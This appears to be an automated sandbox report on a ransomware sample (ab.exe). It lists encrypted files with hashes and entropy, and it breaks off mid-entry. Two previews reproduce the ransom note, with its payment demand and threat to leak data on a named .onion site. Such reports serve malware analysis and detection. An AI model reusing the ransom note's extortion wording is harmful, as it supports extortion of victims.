                        SSDEEP:192:eppMigRHIxjjA86PivzJQPz7hqIRe0xZh6McVuV+n:0pM95IW3Pezs7kMnC7
                        MD5:F8BA46F9A80CF8A8F35E7218FA651F42
                        SHA1:87CE8DC9DADBD630DF7EB78F4E71B5C027915988
                        SHA-256:BF079E760365D2975E6DE609DA142983135F55E7103368901804529B01CFF673
                        SHA-512:9625A71461B55854D3D30844AB3405151FF58D5DB56F176E05E0DBC8DC001C6B63F71B2BDE39FE4DA1FE71F89B1AADF116321AB7F9214C14BEE6394E9AEAA87D
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977158935336416
                        Encrypted:false
                        SSDEEP:192:dzsqkcr3YwgloaN7nS+vBtu//M4YZqgWur1oU+cMjteq4eg7zmM1l4gjbsg/ffvA:VKvlj5nNu04YFDpoJxXGzmutj5/ff4
                        MD5:A6CB7175C912634850C25A8FA2F9F2DE
                        SHA1:0DD7E4574FEF7DF05E215F7F726A3DEB0D821DFE
                        SHA-256:DC28F1D7D7124FF81C16D53942A43771A2C58F22061CD74885EEB6788AA63BF1
                        SHA-512:7A806504E47B10B13C6390309D2BF610DB49DB3115C4F33CCD1FBA22244A4623B0700C19CC96C1E8FBEA8ADAE6DAC1EFD63783B3CA9B77A4262BA5B64865E95F
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977158935336416
                        Encrypted:false
                        SSDEEP:192:dzsqkcr3YwgloaN7nS+vBtu//M4YZqgWur1oU+cMjteq4eg7zmM1l4gjbsg/ffvA:VKvlj5nNu04YFDpoJxXGzmutj5/ff4
                        MD5:A6CB7175C912634850C25A8FA2F9F2DE
                        SHA1:0DD7E4574FEF7DF05E215F7F726A3DEB0D821DFE
                        SHA-256:DC28F1D7D7124FF81C16D53942A43771A2C58F22061CD74885EEB6788AA63BF1
                        SHA-512:7A806504E47B10B13C6390309D2BF610DB49DB3115C4F33CCD1FBA22244A4623B0700C19CC96C1E8FBEA8ADAE6DAC1EFD63783B3CA9B77A4262BA5B64865E95F
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9762813311262475
                        Encrypted:false
                        SSDEEP:192:aEj1nxX9wZUTo3o3qj3WgI4dGKlpGyG4q9KZdL5V+n:aEZnxNwP46j3WgI1Sqo/q
                        MD5:ACD1E08330F0F55B4C6A1553605CA23B
                        SHA1:A26301AAB709489262E996BF153691B6AC619B9B
                        SHA-256:E97D8E60BB698D7D45A5D2367730336E56A7EB5714D8F682A6CAAD7B8C40D404
                        SHA-512:596030F457D215AD6A9887DBA654770B59965394D05D2F6DD0FC659A28E55CE5CF4EED5E4386C716A5A65364D6517F815DE9F20219BC9D600E9DD2797AA405D2
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9762813311262475
                        Encrypted:false
                        SSDEEP:192:aEj1nxX9wZUTo3o3qj3WgI4dGKlpGyG4q9KZdL5V+n:aEZnxNwP46j3WgI1Sqo/q
                        MD5:ACD1E08330F0F55B4C6A1553605CA23B
                        SHA1:A26301AAB709489262E996BF153691B6AC619B9B
                        SHA-256:E97D8E60BB698D7D45A5D2367730336E56A7EB5714D8F682A6CAAD7B8C40D404
                        SHA-512:596030F457D215AD6A9887DBA654770B59965394D05D2F6DD0FC659A28E55CE5CF4EED5E4386C716A5A65364D6517F815DE9F20219BC9D600E9DD2797AA405D2
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978330090145761
                        Encrypted:false
                        SSDEEP:192:vijpo83leNhNMK4InRTvSvBanabdIxmaSp6rkw36aenC1SV+n:+oaw20n5R0zIrkw36tC1n
                        MD5:322AADF19704F30D6C34E1306D999F7A
                        SHA1:C21E12D241E367155C160442C326DC64605B2E92
                        SHA-256:D9BE2336917E7F36FA8E269D90C60AF0341E289D95D24475E321DFDAC1DA4D5C
                        SHA-512:6037EC13C7C42F6E98DBD1D3C2ACE6581837C9515C3CF017D6592C26A107E870FDC5AE80C25099863DCEB8D562B8A8418D44315394FD522D066105A14DD3D2BB
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978330090145761
                        Encrypted:false
                        SSDEEP:192:vijpo83leNhNMK4InRTvSvBanabdIxmaSp6rkw36aenC1SV+n:+oaw20n5R0zIrkw36tC1n
                        MD5:322AADF19704F30D6C34E1306D999F7A
                        SHA1:C21E12D241E367155C160442C326DC64605B2E92
                        SHA-256:D9BE2336917E7F36FA8E269D90C60AF0341E289D95D24475E321DFDAC1DA4D5C
                        SHA-512:6037EC13C7C42F6E98DBD1D3C2ACE6581837C9515C3CF017D6592C26A107E870FDC5AE80C25099863DCEB8D562B8A8418D44315394FD522D066105A14DD3D2BB
                        Malicious:false
                        C:\Users\user\Desktop\GAOBCVIQIJ\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3758
                        Entropy (8bit):5.730064789432486
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69e:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USC
                        MD5:41F60F7F111C974C7727BBFA483C63C2
                        SHA1:18587F9751EAAE7C5C779A9BE2FF619CD2625C11
                        SHA-256:9C9D056AC514D49FFAD38C17ADDCCD3DFC4C55132C944DDF76A4BB08A4137D51
                        SHA-512:AC7F11B160C98750B14C4AF6926A02BBC4D42C17BD9A44316DF861CA7BA94BB3FA8C956794C63049F64B341D3EFFCD24601533250633D8BEA585221082D3C1CD
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Desktop\LSBIHQFDVT.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.98012572202099
                        Encrypted:false
                        SSDEEP:192:hKs+JKiO/BAwuyYdcK4EQ2TDWgusQUs0p7QrFp9IqKCb/rPqV+n:hJ/H3YrhvTRusbs0pI9nZXP
                        MD5:739539EBC633007778F01BF49AB86DA3
                        SHA1:8C5E0628C38BC14C548F2759B7185B6E899BC8D9
                        SHA-256:66C629C5A5E4313B71F31C079E8D69BE02348EE78C5CB80EBF96C913B1D7024F
                        SHA-512:E0D2E88608B324DAA050E575F0EE4861D9F257915A8F79C42230A3DD7483A6DAF53BFC2F4FBD98F697E819AEB11E683655571A3147E5709E2B36BFF1D3D6609A
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.98012572202099
                        Encrypted:false
                        SSDEEP:192:hKs+JKiO/BAwuyYdcK4EQ2TDWgusQUs0p7QrFp9IqKCb/rPqV+n:hJ/H3YrhvTRusbs0pI9nZXP
                        MD5:739539EBC633007778F01BF49AB86DA3
                        SHA1:8C5E0628C38BC14C548F2759B7185B6E899BC8D9
                        SHA-256:66C629C5A5E4313B71F31C079E8D69BE02348EE78C5CB80EBF96C913B1D7024F
                        SHA-512:E0D2E88608B324DAA050E575F0EE4861D9F257915A8F79C42230A3DD7483A6DAF53BFC2F4FBD98F697E819AEB11E683655571A3147E5709E2B36BFF1D3D6609A
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977759643434391
                        Encrypted:false
                        SSDEEP:192:KvSX/nSnUW8C1RaELeOObCwJg2GlaRQu1EuZNWWqqYkQujxe+InCUV+n:V+HfRJ6DJJgflaRQuqufaquujE+6CF
                        MD5:566F47657935E7EC6EAA7E780573DBED
                        SHA1:A0500C4C040ACD6BFED5B8068BC991F6B69D75E3
                        SHA-256:D691942ED928C974C10BCD4402FBA1F6023A836648E8A660F9D6E74812B74002
                        SHA-512:2DF146053D06CDE9238C9630772084C8B5E7BE96162C0BC3508A1313F2D4DD38A4FD031C90F4207A8AFCE3FF59FDAF93591CA53EFC3AFA9A696231E2B77ACA32
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977759643434391
                        Encrypted:false
                        SSDEEP:192:KvSX/nSnUW8C1RaELeOObCwJg2GlaRQu1EuZNWWqqYkQujxe+InCUV+n:V+HfRJ6DJJgflaRQuqufaquujE+6CF
                        MD5:566F47657935E7EC6EAA7E780573DBED
                        SHA1:A0500C4C040ACD6BFED5B8068BC991F6B69D75E3
                        SHA-256:D691942ED928C974C10BCD4402FBA1F6023A836648E8A660F9D6E74812B74002
                        SHA-512:2DF146053D06CDE9238C9630772084C8B5E7BE96162C0BC3508A1313F2D4DD38A4FD031C90F4207A8AFCE3FF59FDAF93591CA53EFC3AFA9A696231E2B77ACA32
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.982073770414174
                        Encrypted:false
                        SSDEEP:192:+snS+fRzILRt9YdRfnAMgxdt589GpyxNVOEpgJHMMRaDP4QwThV+n:+wRJMLP9otgdG0I7EEGJHMhDAN+
                        MD5:5EC97A3E7E0D953E1C1F8F22150C2A35
                        SHA1:804139297A367617AA27AE73B68CA49D81613965
                        SHA-256:A1B9C8E42CC60E5BEE088283CEFC38E4DFBABA1C5E11C7122DFADC98E0BC1E14
                        SHA-512:A830FB2A2DAFFD9AB9F6A7A19455F1122A47B1165662735DB6CD984C085D8AAF730D481BDBAD0AFCB7523338A3D8B3FD6DBD24B2257CE3634FBBFBC562BDAAA1
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.982073770414174
                        Encrypted:false
                        SSDEEP:192:+snS+fRzILRt9YdRfnAMgxdt589GpyxNVOEpgJHMMRaDP4QwThV+n:+wRJMLP9otgdG0I7EEGJHMhDAN+
                        MD5:5EC97A3E7E0D953E1C1F8F22150C2A35
                        SHA1:804139297A367617AA27AE73B68CA49D81613965
                        SHA-256:A1B9C8E42CC60E5BEE088283CEFC38E4DFBABA1C5E11C7122DFADC98E0BC1E14
                        SHA-512:A830FB2A2DAFFD9AB9F6A7A19455F1122A47B1165662735DB6CD984C085D8AAF730D481BDBAD0AFCB7523338A3D8B3FD6DBD24B2257CE3634FBBFBC562BDAAA1
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980014852290303
                        Encrypted:false
                        SSDEEP:192:2TaJO0KUgFyXJSWyDw3rxlIDTbskzmZJC4Be5mxRNlwNargOn4fV+n:2WJ9xNyw7bIDXskzm+4Y5MNlwgsOn4I
                        MD5:C399C6ED9CFC02A25FF1550CAA31B8CE
                        SHA1:3AD30F5B51A29B51BAC7562582DB1C1E2A81FDFD
                        SHA-256:666D944652028581FC5DFEAFACBAD7F796B2B22CB29516667C69BF0F00616624
                        SHA-512:85E2C998D880AFC9213528319185E26C17B3AAF3B2B4CCBDF7C535C9EA6E7905735E7430594B96096C027918BE434329422BE55ED346F284E15DA5142CD2429A
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980014852290303
                        Encrypted:false
                        SSDEEP:192:2TaJO0KUgFyXJSWyDw3rxlIDTbskzmZJC4Be5mxRNlwNargOn4fV+n:2WJ9xNyw7bIDXskzm+4Y5MNlwgsOn4I
                        MD5:C399C6ED9CFC02A25FF1550CAA31B8CE
                        SHA1:3AD30F5B51A29B51BAC7562582DB1C1E2A81FDFD
                        SHA-256:666D944652028581FC5DFEAFACBAD7F796B2B22CB29516667C69BF0F00616624
                        SHA-512:85E2C998D880AFC9213528319185E26C17B3AAF3B2B4CCBDF7C535C9EA6E7905735E7430594B96096C027918BE434329422BE55ED346F284E15DA5142CD2429A
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979869139483104
                        Encrypted:false
                        SSDEEP:192:S/MgHFtWhobuXqMLkl4jjBcCCiGulkuvNJ3DXNoD2faJV+n:SEgHFCob/4kMjBcCbGul9J3SWaW
                        MD5:A01805CBA96EEA193DD185B472AB0687
                        SHA1:F2EBB66D34AD7C4B16A0E306A62B7A9D29993920
                        SHA-256:00F05D157EC5F6088A21EACFD09503010F8250D1A35B1C90FFF592FDEA3DA951
                        SHA-512:5B30ED7D037C772F8C1ECB42CC18BC22AB4715916D9823666B4D244DAA94C130FA784BC669D98972987846CE55A3766650206AD5C6226384C95E3591F0C79E80
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979869139483104
                        Encrypted:false
                        SSDEEP:192:S/MgHFtWhobuXqMLkl4jjBcCCiGulkuvNJ3DXNoD2faJV+n:SEgHFCob/4kMjBcCbGul9J3SWaW
                        MD5:A01805CBA96EEA193DD185B472AB0687
                        SHA1:F2EBB66D34AD7C4B16A0E306A62B7A9D29993920
                        SHA-256:00F05D157EC5F6088A21EACFD09503010F8250D1A35B1C90FFF592FDEA3DA951
                        SHA-512:5B30ED7D037C772F8C1ECB42CC18BC22AB4715916D9823666B4D244DAA94C130FA784BC669D98972987846CE55A3766650206AD5C6226384C95E3591F0C79E80
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976243017495167
                        Encrypted:false
                        SSDEEP:192:H3tO90IFcemEsETYhqGZwaUA67YqXEz4FmaCTNbDV+n:W0xem/1ZUo8TFlCBb0
                        MD5:45C14B3608A85F81FDB9826258B3A2EF
                        SHA1:6EC31E06CE0D4E5788FF3C06C8FE0680C4883DB1
                        SHA-256:D05C6A4EBEAFDCC076CD3F15FD0588D2F51917BEE7936383F846F6F4D5C4C5D4
                        SHA-512:9D4B75874A91717265EEDB5B13015A23B8FA39B4C5E0A015AC08DE56AA7C0F062EDC76748C873793F83509F07839AD6E0FFC3DBAC70BF080F04D148D84CB4A6E
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976243017495167
                        Encrypted:false
                        SSDEEP:192:H3tO90IFcemEsETYhqGZwaUA67YqXEz4FmaCTNbDV+n:W0xem/1ZUo8TFlCBb0
                        MD5:45C14B3608A85F81FDB9826258B3A2EF
                        SHA1:6EC31E06CE0D4E5788FF3C06C8FE0680C4883DB1
                        SHA-256:D05C6A4EBEAFDCC076CD3F15FD0588D2F51917BEE7936383F846F6F4D5C4C5D4
                        SHA-512:9D4B75874A91717265EEDB5B13015A23B8FA39B4C5E0A015AC08DE56AA7C0F062EDC76748C873793F83509F07839AD6E0FFC3DBAC70BF080F04D148D84CB4A6E
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979914364379438
                        Encrypted:false
                        SSDEEP:192:65doJBeuD/TEEaWMOVPkCmE9Gy4sY/SIMvlgV+n:moHeuD7EEWUPdzwSIMNZ
                        MD5:2FB1513EDEFA0C8EF8AE7C8AB410049F
                        SHA1:3AFF715E3EDFCBEE3801A6D81088875B2E941C9C
                        SHA-256:DDDE7183DA60E6526499CDF42FBEA175FCCC2DC61B64A59DD94E08D0B0DDC8F2
                        SHA-512:0E6C46B7457C5472120757FABDE9C2134E652D76DF5BE11A51063D18FE63AC38F06CA613A6BE6FFF9399A491C275627360E723152C702974F7E1E3AF2BC0763F
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979914364379438
                        Encrypted:false
                        SSDEEP:192:65doJBeuD/TEEaWMOVPkCmE9Gy4sY/SIMvlgV+n:moHeuD7EEWUPdzwSIMNZ
                        MD5:2FB1513EDEFA0C8EF8AE7C8AB410049F
                        SHA1:3AFF715E3EDFCBEE3801A6D81088875B2E941C9C
                        SHA-256:DDDE7183DA60E6526499CDF42FBEA175FCCC2DC61B64A59DD94E08D0B0DDC8F2
                        SHA-512:0E6C46B7457C5472120757FABDE9C2134E652D76DF5BE11A51063D18FE63AC38F06CA613A6BE6FFF9399A491C275627360E723152C702974F7E1E3AF2BC0763F
                        Malicious:false
                        C:\Users\user\Desktop\LSBIHQFDVT\uCLrcwQ_readme_.txt
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:ASCII text, with very long lines, with CRLF, CR, LF line terminators
                        Category:dropped
                        Size (bytes):3762
                        Entropy (8bit):5.731391626840331
                        Encrypted:false
                        SSDEEP:48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69H:L95zhLNbXGZUe7Ka6pU6i9fLrvE69UST
                        MD5:C75AC33345088DA90A7527CE91E7D9B6
                        SHA1:89F6095CA18A0C9BB57C79E727B66DF2A36459D3
                        SHA-256:89ACED8641EBD571391EBECFF4C6665B49068038712135392F066BF095D99042
                        SHA-512:5C159E68B9AB5EFBFA09E57AD65A3081C0A2EB5A1056767681EEB30391AF7524F7F24C2706858B74465086E411D91AF498C266FCF265D87ADF6C4C7BC77A3CED
                        Malicious:false
                        Preview: -------=== Your network has been infected! ===-------.........***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED *****************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------
                        C:\Users\user\Desktop\PALRGUCVEH.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976748120492981
                        Encrypted:false
                        SSDEEP:192:3rrR909YAleD4ivG8ZmhnazUi+Sj8GTaV+n:pmeAvcGkDoNSjj
                        MD5:BA1115F85960C4D0C9DE6123AFF2CF8D
                        SHA1:B37463FCAEB0219662C02E6C8939AC3922511321
                        SHA-256:6FFADFAA4EBE727073EA18AC9CA1FC5E915D7C4A433D9B7E89F608741967F0EE
                        SHA-512:A6FF88435D43913C9E5280232490E1D6AE2167BDBF740ED4E2A28015EBEFC5B10AE5E31EF6EF153276A209C3FE8667562988D01FAE560949AE3C3EF1BBF035F0
                        Malicious:false
                        C:\Users\user\Desktop\PALRGUCVEH.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.976748120492981
                        Encrypted:false
                        SSDEEP:192:3rrR909YAleD4ivG8ZmhnazUi+Sj8GTaV+n:pmeAvcGkDoNSjj
                        MD5:BA1115F85960C4D0C9DE6123AFF2CF8D
                        SHA1:B37463FCAEB0219662C02E6C8939AC3922511321
                        SHA-256:6FFADFAA4EBE727073EA18AC9CA1FC5E915D7C4A433D9B7E89F608741967F0EE
                        SHA-512:A6FF88435D43913C9E5280232490E1D6AE2167BDBF740ED4E2A28015EBEFC5B10AE5E31EF6EF153276A209C3FE8667562988D01FAE560949AE3C3EF1BBF035F0
                        Malicious:false
                        C:\Users\user\Desktop\PWCCAWLGRE.mp3
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9812873138034055
                        Encrypted:false
                        SSDEEP:192:lOCDIKuuUlelrOXUXLwnytaaYfrNcH2IqrkWuGD+jSnN4RsLy4V+n:l8xelCXUL9taqhWkpGHnN4mS
                        MD5:3DCD8E5F45170DEA1EC9F33642B9D569
                        SHA1:B05184D94DFFFB07C370F7C468349F4D4FDCF449
                        SHA-256:D8ED18B2FFDE804F4BAB77442C7EAB32B6BECA2AA6FA3A0D850DDDD29EF5AD9B
                        SHA-512:3069519753509F700C1ADE63F6AECA6FDD26CFD9C2BB0B80D178151F54498BDB42B440E51DC1BAD58B8C43E296D04AF2E543713538B0E5A4D5B6EE2F228B72E9
                        Malicious:false
                        C:\Users\user\Desktop\PWCCAWLGRE.mp3.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.9812873138034055
                        Encrypted:false
                        SSDEEP:192:lOCDIKuuUlelrOXUXLwnytaaYfrNcH2IqrkWuGD+jSnN4RsLy4V+n:l8xelCXUL9taqhWkpGHnN4mS
                        MD5:3DCD8E5F45170DEA1EC9F33642B9D569
                        SHA1:B05184D94DFFFB07C370F7C468349F4D4FDCF449
                        SHA-256:D8ED18B2FFDE804F4BAB77442C7EAB32B6BECA2AA6FA3A0D850DDDD29EF5AD9B
                        SHA-512:3069519753509F700C1ADE63F6AECA6FDD26CFD9C2BB0B80D178151F54498BDB42B440E51DC1BAD58B8C43E296D04AF2E543713538B0E5A4D5B6EE2F228B72E9
                        Malicious:false
                        C:\Users\user\Desktop\QCFWYSKMHA.png
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979221173148451
                        Encrypted:false
                        SSDEEP:192:FU3U/EwS5ET5WIouqh0FM3XcfJuFmD6+VskKO7eI23k5dAV+n:FU36EwS5mIIo1i+XcfJuj+VVWI2U5
                        MD5:AC56A88E6FFF6A4D1AF96CEBA58EF941
                        SHA1:82C1D65E7DA21727ACE9626C35F73C5B6A36A306
                        SHA-256:F4599CC6F6A84D56A6E25B0027A732B051A1FEA4080A4133EC91194EFF978079
                        SHA-512:72453A2FAFAF87B9BB59AB83F28813E120977EE765C66163AB23A77862565BEEECCECD76FEBAEF8ED6F7E5C60251ED41BFF344BBE3503C9A782A69211AD38329
                        Malicious:false
                        C:\Users\user\Desktop\QCFWYSKMHA.png.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.979221173148451
                        Encrypted:false
                        SSDEEP:192:FU3U/EwS5ET5WIouqh0FM3XcfJuFmD6+VskKO7eI23k5dAV+n:FU36EwS5mIIo1i+XcfJuj+VVWI2U5
                        MD5:AC56A88E6FFF6A4D1AF96CEBA58EF941
                        SHA1:82C1D65E7DA21727ACE9626C35F73C5B6A36A306
                        SHA-256:F4599CC6F6A84D56A6E25B0027A732B051A1FEA4080A4133EC91194EFF978079
                        SHA-512:72453A2FAFAF87B9BB59AB83F28813E120977EE765C66163AB23A77862565BEEECCECD76FEBAEF8ED6F7E5C60251ED41BFF344BBE3503C9A782A69211AD38329
                        Malicious:false
                        C:\Users\user\Desktop\QCFWYSKMHA.xlsx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977860329092125
                        Encrypted:false
                        SSDEEP:192:aaWU3X45lr4yiRaqoPpsuRY8VQhf2afN3zuzRu4glqbV+n:GU3sdGRaqoqJ2QhfDN3zAu3J
                        MD5:0611F51D2DA25AF887A58B5C9A5A41A3
                        SHA1:528361487F7509797D0DC8ACBA7116423CEADB36
                        SHA-256:7C9E3B1448A162AF2CC26E550E37840FF21DDCDD4A0D792CADA9E438189E94FB
                        SHA-512:1884254663CB20584EA91435F269482D225BFD513BF06EAD239929DFB980E5BC8469F81205AE7495FBCE8622A3539A9F99B021A3DFD9859FA07ED63D84D6826E
                        Malicious:false
                        C:\Users\user\Desktop\QCFWYSKMHA.xlsx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.977860329092125
                        Encrypted:false
                        SSDEEP:192:aaWU3X45lr4yiRaqoPpsuRY8VQhf2afN3zuzRu4glqbV+n:GU3sdGRaqoqJ2QhfDN3zAu3J
                        MD5:0611F51D2DA25AF887A58B5C9A5A41A3
                        SHA1:528361487F7509797D0DC8ACBA7116423CEADB36
                        SHA-256:7C9E3B1448A162AF2CC26E550E37840FF21DDCDD4A0D792CADA9E438189E94FB
                        SHA-512:1884254663CB20584EA91435F269482D225BFD513BF06EAD239929DFB980E5BC8469F81205AE7495FBCE8622A3539A9F99B021A3DFD9859FA07ED63D84D6826E
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ.docx
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978547796797249
                        Encrypted:false
                        SSDEEP:192:4mgdiDazuDUBBF8oj47J2PLk4moGHsWb0MV+n:4rymuDqBB47AjkuiU
                        MD5:1AF33DC577EC48E7265C09F31EDA0AAA
                        SHA1:E1C19E4F2FD86772160856AFFB9E27E885E9395D
                        SHA-256:3B40A5C77E644B5CC5A4149547E12F756A6248D13D3C9225D49E042D23DF94AC
                        SHA-512:2CA3B078808E86356ECB66C35AAEC4BCFA0559A85F1D5B4C540EE8B41F59B1F6B80E2AB14059E8A56FDF1B5548EADF59F3B4A7EDAA85031C2066BD34C35A5231
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ.docx.bCcBDeabea (copy)
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.978547796797249
                        Encrypted:false
                        SSDEEP:192:4mgdiDazuDUBBF8oj47J2PLk4moGHsWb0MV+n:4rymuDqBB47AjkuiU
                        MD5:1AF33DC577EC48E7265C09F31EDA0AAA
                        SHA1:E1C19E4F2FD86772160856AFFB9E27E885E9395D
                        SHA-256:3B40A5C77E644B5CC5A4149547E12F756A6248D13D3C9225D49E042D23DF94AC
                        SHA-512:2CA3B078808E86356ECB66C35AAEC4BCFA0559A85F1D5B4C540EE8B41F59B1F6B80E2AB14059E8A56FDF1B5548EADF59F3B4A7EDAA85031C2066BD34C35A5231
                        Malicious:false
                        C:\Users\user\Desktop\QNCYCDFIJJ.jpg
                        Process:C:\Users\user\Desktop\ab.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):8728
                        Entropy (8bit):7.980538899760363
                        Encrypted:false
                        SSDEEP:192:ZAE4/1zdV9XFMaEhv3ZorCLLH6Qvu9I6X2Zn+a9PyG/wuF2csvV+n:Zop4am/ZorC/HRvu9IWSnFyG/wun
                        MD5:9CC5974F5685D94A4F42A3BCD8D17FCE
                        SHA1:177F93B0C98EE538D2088DEC3ABA28F180545B5E
